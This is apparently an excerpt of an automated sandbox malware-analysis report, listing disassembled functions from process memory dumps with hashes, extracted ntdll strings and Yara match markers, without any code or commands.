                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: ee46935ea2979961382aa7ef2361e65d6b6dcf0072771ea575ceed19ad7fde80
                                                      • Instruction ID: 42185353863e77348371bafa71aab61e79039e133af57ef3587a68c312954a33
                                                      • Opcode Fuzzy Hash: ee46935ea2979961382aa7ef2361e65d6b6dcf0072771ea575ceed19ad7fde80
                                                      • Instruction Fuzzy Hash: 2E90027630140846D20071584444B46005587E0302F95C016A9168654D8615CD557922
                                                      Function 05852F90 Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 70fc0462a1ae32b1cd6cf50193b88bc178ea1c53ca5842214611ee2959086e2e
                                                      • Instruction ID: 5ab705b1a7da1e7bc0f956b08825fda2efaefd068c4194a0e5cb15ae7e0119dd
                                                      • Opcode Fuzzy Hash: 70fc0462a1ae32b1cd6cf50193b88bc178ea1c53ca5842214611ee2959086e2e
                                                      • Instruction Fuzzy Hash: 5090027630180406D2007158485470B005587D0303F95C011AA1A8555D86258D556972
                                                      Function 05852FA0 Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2843bbe325d930f6d655c895a11c76f244d99ed3e17100b41929f8cb49bf57f7
                                                      • Instruction ID: b710d10563e931b73e77abab363670164912c24158999ce46cb9df16b8a000a3
                                                      • Opcode Fuzzy Hash: 2843bbe325d930f6d655c895a11c76f244d99ed3e17100b41929f8cb49bf57f7
                                                      • Instruction Fuzzy Hash: 9890027630180406D20071584848747005587D0303F95C011AE1A8555E8665CD956932
                                                      Function 05852FB0 Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 044cb5b15dfb6bf9304e79fc3853a4e9e55eb5378e48253fedb043302be7284a
                                                      • Instruction ID: 213560849bee0c8e38b766836be71c9f237d1d4bd6382ed2480b62870c0b5a58
                                                      • Opcode Fuzzy Hash: 044cb5b15dfb6bf9304e79fc3853a4e9e55eb5378e48253fedb043302be7284a
                                                      • Instruction Fuzzy Hash: 4B90026670140046424071688884A064055ABE1212795C121A99DC550D85598D695A66
                                                      Function 05852FE0 Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 43f83db1730372aca6739d97222efd9dad341b2f49810b77cf33a1bdc4ed91b2
                                                      • Instruction ID: 488ab0aab65714cfcd366177f5e97bcf31a23eb93069457ef6575586d3a925de
                                                      • Opcode Fuzzy Hash: 43f83db1730372aca6739d97222efd9dad341b2f49810b77cf33a1bdc4ed91b2
                                                      • Instruction Fuzzy Hash: A5900266311C0046D30075684C54B07005587D0303F95C115A9198554CC9158D655922
                                                      Function 05852F30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 33fe00cc1fbdab1d9bd94bacc02407150d7408212bbc85b9e25b23d47bceeddd
                                                      • Instruction ID: 19ecd1792c8fa01420ab25f7008dd238462e3c593d8e53a7ff9625614e6ac5ac
                                                      • Opcode Fuzzy Hash: 33fe00cc1fbdab1d9bd94bacc02407150d7408212bbc85b9e25b23d47bceeddd
                                                      • Instruction Fuzzy Hash: 4E9002A634140446D20071584454B060055C7E1302F95C015EA0A8554D8619CD566527
                                                      Function 05852F60 Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 62134ba8954896a373189859aec447d0bb5a3770d04983c9dc27c6c81e471d1c
                                                      • Instruction ID: 9b912753c9a7bcafbd8390765a02f3bb645fc7cc53182db81269c9431d403b96
                                                      • Opcode Fuzzy Hash: 62134ba8954896a373189859aec447d0bb5a3770d04983c9dc27c6c81e471d1c
                                                      • Instruction Fuzzy Hash: 519002A631140046D20471584444706009587E1202F95C012AB198554CC5298D655526
                                                      Function 05852E80 Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a5713e90f765ff0b9d57b40e8a144664495deae2144a0ea511b4c9f7bde4e76e
                                                      • Instruction ID: 339f27155d3dbca42ab9f1eda3a0f2d623622e1d96838e424cbe56baa5cf57f6
                                                      • Opcode Fuzzy Hash: a5713e90f765ff0b9d57b40e8a144664495deae2144a0ea511b4c9f7bde4e76e
                                                      • Instruction Fuzzy Hash: 7F90026670140506D20171584444716005A87D0242FD5C022AA068555ECA258E96A532
                                                      Function 05852EA0 Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 74dee0e94005e8e2c99589fea40a6cbf68376b4937ee4c32f8f9b12c54ebfe2b
                                                      • Instruction ID: bcc0e772404ec10287904c64e527994e3134ba42f9641ce7c1012c15a5e79280
                                                      • Opcode Fuzzy Hash: 74dee0e94005e8e2c99589fea40a6cbf68376b4937ee4c32f8f9b12c54ebfe2b
                                                      • Instruction Fuzzy Hash: BB9002B630140406D24071584444746005587D0302F95C011AE0A8554E86598ED96A66
                                                      Function 05852EE0 Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e95ce7befa397efe64adf7105c1036aaf98144a70e8917f92e2fc589ac26efc6
                                                      • Instruction ID: 274cb3f1e6cbc1093cdf51d805ad77f523aa2f2611e7e0869b68eebc041fae6c
                                                      • Opcode Fuzzy Hash: e95ce7befa397efe64adf7105c1036aaf98144a70e8917f92e2fc589ac26efc6
                                                      • Instruction Fuzzy Hash: CF9002A630180407D24075584844707005587D0303F95C011AB0A8555E8A298D556536
                                                      Function 05852E30 Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2477c12abdeb2d76576c8425263eb16759b4af3630ec48c2c0ba5f6d15886626
                                                      • Instruction ID: 5784ae2ee6a77c103c4f59f50bac752c719452025897e917f5d2163bf298e8b7
                                                      • Opcode Fuzzy Hash: 2477c12abdeb2d76576c8425263eb16759b4af3630ec48c2c0ba5f6d15886626
                                                      • Instruction Fuzzy Hash: 2890026630140406D202715844547060059C7D1346FD5C012EA468555D86258E57A533
                                                      Function 058539B0 Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4dc78dcd59595a4c0344dc79d0f83ce6e266ae76a52f3d6720b7dc0d653e5aab
                                                      • Instruction ID: faf61164450832927b63795d7ff820585e8211df095c6880a746e03d8c6dac7a
                                                      • Opcode Fuzzy Hash: 4dc78dcd59595a4c0344dc79d0f83ce6e266ae76a52f3d6720b7dc0d653e5aab
                                                      • Instruction Fuzzy Hash: 1690026634545106D250715C44447164055A7E0202F95C021A9858594D85558D596622
                                                      Function 05852B80 Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 452fe0e4d45209fecf8889fa7535b7b10daa7ae1d5ae751d5a17fd2349f39bab
                                                      • Instruction ID: a06f5c68166c42c02385a23185c9a351c4535bc86748d913556484c1459700d3
                                                      • Opcode Fuzzy Hash: 452fe0e4d45209fecf8889fa7535b7b10daa7ae1d5ae751d5a17fd2349f39bab
                                                      • Instruction Fuzzy Hash: 9390027630140806D20471584844786005587D0302F95C011AF068655E96658D957532
                                                      Function 05852BA0 Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 127190d42b88ef085227dcd770ab07322e227b5fa6dbf77ffe57da583e134e29
                                                      • Instruction ID: b586508089cf43cea78685d37b33b908d6d4cf55a4b6f11ba842dacea2a08654
                                                      • Opcode Fuzzy Hash: 127190d42b88ef085227dcd770ab07322e227b5fa6dbf77ffe57da583e134e29
                                                      • Instruction Fuzzy Hash: 1D90027670540806D25071584454746005587D0302F95C011A9068654D87558F597AA2
                                                      Function 05852BE0 Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 65a0e64e4a015b077e7e4b12297d14bbe3e86b0a9d67ba152f2c9f4a81757f22
                                                      • Instruction ID: 6ea5607fe459f864998637d205a9b0d10e942445bbad47fb6c70c343a75466fb
                                                      • Opcode Fuzzy Hash: 65a0e64e4a015b077e7e4b12297d14bbe3e86b0a9d67ba152f2c9f4a81757f22
                                                      • Instruction Fuzzy Hash: 1F90027630544846D24071584444B46006587D0306F95C011A90A8694D96258E59BA62
                                                      Function 05852BF0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c1369f9dae11661f68d3dae6562deb6eb0f70cc146dca182dc9edbc5d953a98b
                                                      • Instruction ID: 980c0686ef0a7e53e0915eab68c5c2e4ba7f91f5d39a92bf3488eeb17bc34953
                                                      • Opcode Fuzzy Hash: c1369f9dae11661f68d3dae6562deb6eb0f70cc146dca182dc9edbc5d953a98b
                                                      • Instruction Fuzzy Hash: 5590027630140806D2807158444474A005587D1302FD5C015A9069654DCA158F5D7BA2
                                                      Function 05852AB0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a07b69f35add45f5d4ae168bf4bfa043b7fbce0251d04b60b97bdd8718f8f490
                                                      • Instruction ID: b3037650990a9d6c4c10bf304ba8016cc0ab357810a80d34bb7db3103c56cf02
                                                      • Opcode Fuzzy Hash: a07b69f35add45f5d4ae168bf4bfa043b7fbce0251d04b60b97bdd8718f8f490
                                                      • Instruction Fuzzy Hash: 0E9002E6301540964600B2588444B0A455587E0202B95C016EA098560CC5258D559536
                                                      Function 05852AD0 Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 06ef8d3482613a6b46da7ee9d66ef0e228fc920d71b6fba52bb162181e5b49bf
                                                      • Instruction ID: 36a10c347ca8df9ef014bf358bed1a9a8fa9f3da3252bdebfaa2e55b03df247d
                                                      • Opcode Fuzzy Hash: 06ef8d3482613a6b46da7ee9d66ef0e228fc920d71b6fba52bb162181e5b49bf
                                                      • Instruction Fuzzy Hash: 4790026A311400070205B5580744607009687D5352395C021FA059550CD6218D655522
                                                      Function 05852AF0 Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b46d87611bc53b78f592bdb5bda86f2552f51f6a8ee9a2bc21c52f464115b24f
                                                      • Instruction ID: f467ce0612bc638ec1a2ebee20833b01f8efd3ae43c01d466e0cde20b099f002
                                                      • Opcode Fuzzy Hash: b46d87611bc53b78f592bdb5bda86f2552f51f6a8ee9a2bc21c52f464115b24f
                                                      • Instruction Fuzzy Hash: 7C90026A321400060245B558064460B049597D63523D5C015FA45A590CC6218D695722
                                                      Function 05852C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                      • Instruction ID: 05050798e5b11a27c6fd14dba94bb7593e17294b8f36744519dce8bca5eccb1d
                                                      • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                      • Instruction Fuzzy Hash:
                                                      Function 05852890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID: ___swprintf_l
                                                      • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                      • API String ID: 48624451-2108815105
                                                      • Opcode ID: df7bcf6786651f285344b9d047efb3afcbd41b284fba43edef70afab24d44f58
                                                      • Instruction ID: 3b104be61fa736d0452597b32bcc654b18282f7383cff973d845032ccbe757d2
                                                      • Opcode Fuzzy Hash: df7bcf6786651f285344b9d047efb3afcbd41b284fba43edef70afab24d44f58
                                                      • Instruction Fuzzy Hash: B15109B9A0421ABFCB15EB988880D7EF7B9FB082147508129ECA6D7641D634DE4487E1
                                                      Function 05847630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • Execute=1, xrefs: 05884713
                                                      • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 058846FC
                                                      • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 05884742
                                                      • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 05884655
                                                      • ExecuteOptions, xrefs: 058846A0
                                                      • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 05884725
                                                      • CLIENT(ntdll): Processing section info %ws..., xrefs: 05884787
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                      • API String ID: 0-484625025
                                                      • Opcode ID: cb8017e254d933d0bc6077a1be1829d9bce5bb98b3253d5e23b97a35d4959fec
                                                      • Instruction ID: 709d35b967666b3029f1d1597b9b6ebc5046a797d244c43464ca3eac88e54694
                                                      • Opcode Fuzzy Hash: cb8017e254d933d0bc6077a1be1829d9bce5bb98b3253d5e23b97a35d4959fec
                                                      • Instruction Fuzzy Hash: 6851E67170031DAAEF15EAA8DC89FBA77A9FB04304F4400A9EE05E7190EB719E46CF51
                                                      Function 0585B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID: __aulldvrm
                                                      • String ID: +$-$0$0
                                                      • API String ID: 1302938615-699404926
                                                      • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                      • Instruction ID: b5e9e21cfd718acc2480310fadae702568aa5fa649208b3675b64cbfcc16be39
                                                      • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                      • Instruction Fuzzy Hash: E3819070A092499FDF24CE68C8917BEBBA2BF65372F184159DCA3E7290C7349C448B51
                                                      Function 0584BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 05887B7F
                                                      • RTL: Resource at %p, xrefs: 05887B8E
                                                      • RTL: Re-Waiting, xrefs: 05887BAC
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                      • API String ID: 0-871070163
                                                      • Opcode ID: 443221ec70a508651361ac3fac9058a03edb8d63b894aa1cc1600ff717820df9
                                                      • Instruction ID: d9dc9e817189ed6bdf1b93efe464baccdc69ea14d383874c982b9f8f8a022b89
                                                      • Opcode Fuzzy Hash: 443221ec70a508651361ac3fac9058a03edb8d63b894aa1cc1600ff717820df9
                                                      • Instruction Fuzzy Hash: 3D419E313047069BDB25DF298940B6AB7E6EB88711F140A1DED5ADB680DB31EC058F91
                                                      Function 0584B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0588728C
                                                      Strings
                                                      • RTL: Resource at %p, xrefs: 058872A3
                                                      • RTL: Re-Waiting, xrefs: 058872C1
                                                      • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 05887294
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                      • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                      • API String ID: 885266447-605551621
                                                      • Opcode ID: 7d9d04a8ee99025fe9587cf25a0b3dfd003bdb625456d45393bd9fd1042f298c
                                                      • Instruction ID: 574db675147929efcd957424e9c919cce8fe56ec062432c0fb9d4fd7f4217555
                                                      • Opcode Fuzzy Hash: 7d9d04a8ee99025fe9587cf25a0b3dfd003bdb625456d45393bd9fd1042f298c
                                                      • Instruction Fuzzy Hash: 1E41F03170420AABCB25EE28CC41F66B7A5FB44715F240618FD56DB240DB32EC42CBD1
                                                      Function 05857D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID: __aulldvrm
                                                      • String ID: +$-
                                                      • API String ID: 1302938615-2137968064
                                                      • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                      • Instruction ID: ec843a9785fda3cb0cf45dff9183d90f0ccae816969650da2ce581ceeeff44ec
                                                      • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                      • Instruction Fuzzy Hash: 2191A270E0421A9BDF24DE69C881ABEB7A6FF447B0F64852AFC55E72C0D7309D418B51
                                                      Function 05819126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $$@
                                                      • API String ID: 0-1194432280
                                                      • Opcode ID: 31ec80582945d14381e39c91951bd120ea5c3e04012bde8784e4a403806f0029
                                                      • Instruction ID: 743367179b2a2f225de83b041b6743624b59790eda521a9e441b5b2c7fc2167a
                                                      • Opcode Fuzzy Hash: 31ec80582945d14381e39c91951bd120ea5c3e04012bde8784e4a403806f0029
                                                      • Instruction Fuzzy Hash: 05812975D04269DBDB25DB54CC49BEAB7B8AB08710F0041EAED1AF7280D7709E84CFA5
                                                      Function 0589CEA0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • @_EH4_CallFilterFunc@8.LIBCMT ref: 0589CFBD
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID: CallFilterFunc@8
                                                      • String ID: @$@4Qw@4Qw
                                                      • API String ID: 4062629308-2383119779
                                                      • Opcode ID: 0e46d8d1fab77af1b828c3c9fc1658f6530bd3d36c004f443dec963ca6d32c60
                                                      • Instruction ID: 21c512f8d5c1a599a630640acd11a27625fd35273a7139fcf5733ae31d69e17f
                                                      • Opcode Fuzzy Hash: 0e46d8d1fab77af1b828c3c9fc1658f6530bd3d36c004f443dec963ca6d32c60
                                                      • Instruction Fuzzy Hash: AD419C71A01328DFCB25DFA9C844AAEBBB8FF44B10F04482AED05DB254DB749C41CB65

                                                      Executed Functions

                                                      Function 043CE763 Relevance: 36.8, Strings: 29, Instructions: 500COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3299760610.00000000043B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 043B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_43b0000_tiwTBKVufjvhPL.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: k$"$*n$.$/.$0]+$3K$3y$4$;$<;$A$F$I$I$K$P8$T$Y1$ZJ$a@$h4$i'$w$y.$}$1$X$m
                                                      • API String ID: 0-3326691694
                                                      • Opcode ID: 5bf37a56b6b173d3ca7fc028912a601bbf148462edf37ded7cc2e64b3569df08
                                                      • Instruction ID: 876324945e4742ad97ab6ae428222fbcc6343ea10fbf5fd3d6215cc169ff12eb
                                                      • Opcode Fuzzy Hash: 5bf37a56b6b173d3ca7fc028912a601bbf148462edf37ded7cc2e64b3569df08
                                                      • Instruction Fuzzy Hash: B3528CB0905668CBEB24CF44C9997DDBBB2BB44308F1095DAD60A7B280D7B96E85CF44
                                                      Function 043DC0A3 Relevance: 6.4, Strings: 5, Instructions: 147COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3299760610.00000000043B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 043B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_43b0000_tiwTBKVufjvhPL.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 6$O$S$\$s
                                                      • API String ID: 0-3854637164
                                                      • Opcode ID: 4da9a352018a53039141f5a4d36d5e93a63709fd1c2a1182046ce407dc70b30a
                                                      • Instruction ID: 150bded45cde5860ce48838ef7ffa3ef0effb8962eacd2b7ca99e7adff3dbef1
                                                      • Opcode Fuzzy Hash: 4da9a352018a53039141f5a4d36d5e93a63709fd1c2a1182046ce407dc70b30a
                                                      • Instruction Fuzzy Hash: 464183B2D11129BBEB10EB95EC49FEAB3B8EF48314F005199E90897140E771BB54CBE1
